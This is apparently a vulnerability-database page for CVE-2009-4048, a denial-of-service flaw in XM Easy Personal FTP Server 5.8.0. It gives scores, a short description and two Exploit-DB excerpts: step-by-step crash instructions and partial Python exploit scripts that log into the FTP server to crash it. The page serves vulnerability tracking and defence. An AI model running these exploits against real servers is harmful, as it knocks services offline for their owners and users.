CVE-2009-4048
published 2009-11-23CVE-2009-4048: Dxmsoft XM Easy Personal FTP Server 5.8.0 allows remote authenticated users to cause a denial of service (daemon outage) via an APPE command to one socket in…
PriorityP416medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
2.41%
82.0th percentile
Dxmsoft XM Easy Personal FTP Server 5.8.0 allows remote authenticated users to cause a denial of service (daemon outage) via an APPE command to one socket in conjunction with a DELE command to a second socket.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dxmsoft | xm_easy_personal_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
exploitdb·2009-11-24
CVE-2009-4108 XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
---
Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server failed to handle more than 2000 files or folders in
the root directory.
Details:
if you could log on the server, take the following steps and the server will
crash which lead to DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous
Exploit-DB
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
exploitdb·2009-11-13
CVE-2009-4108 XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
---
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
so
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/507853/100/0/threadedhttp://www.securityfocus.com/bid/37016https://exchange.xforce.ibmcloud.com/vulnerabilities/54277http://www.securityfocus.com/archive/1/507853/100/0/threadedhttp://www.securityfocus.com/bid/37016https://exchange.xforce.ibmcloud.com/vulnerabilities/54277
2009-11-23
Published